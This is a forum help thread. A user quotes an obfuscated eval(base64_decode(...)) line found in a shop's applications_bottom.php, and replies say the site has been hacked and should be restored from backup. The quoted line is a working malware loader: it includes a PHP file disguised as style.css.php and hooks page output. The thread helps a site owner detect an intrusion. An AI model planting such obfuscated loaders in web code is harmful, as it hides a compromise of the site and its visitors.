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Wierd code.


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I got this code in applications_bottom.php

<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lL2ZhdHBpcGUvcHVibGljX2h0bWwvYWRtaW4vaW5jbHVkZXMvbGFuZ3VhZ2VzL2VuZ2xpc2gvaW1hZ2VzL2J1dHRvbnMvc3R5bGUuY3NzLnBocCc7aWYoZmlsZV9leGlzdHMoJEdMT0JBTFNbJ21mc24nXSkpe2luY2x1ZGVfb25jZSgkR0xPQkFMU1snbWZzbiddKTtpZihmdW5jdGlvbl9leGlzdHMoJ2dtbCcpJiZmdW5jdGlvbl9leGlzdHMoJ2Rnb2JoJykpe29iX3N0YXJ0KCdkZ29iaCcpO319fQ==')); ?>

As it is encoded using base64 it gives me a weird feeling. Should this be there in version 2.2 RC2a?

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that looks very much like you have been hacked, you will need to clear that out, or preferably restore from a back up of your store. after deleting the fileset on the server first

Then follow the security suggestions


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The hack decodes to this:



Look for this hack file:




There may be others.


Once securiy is compromised treat EVERY FILE as guilty until proven innocent by close inspection.

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.


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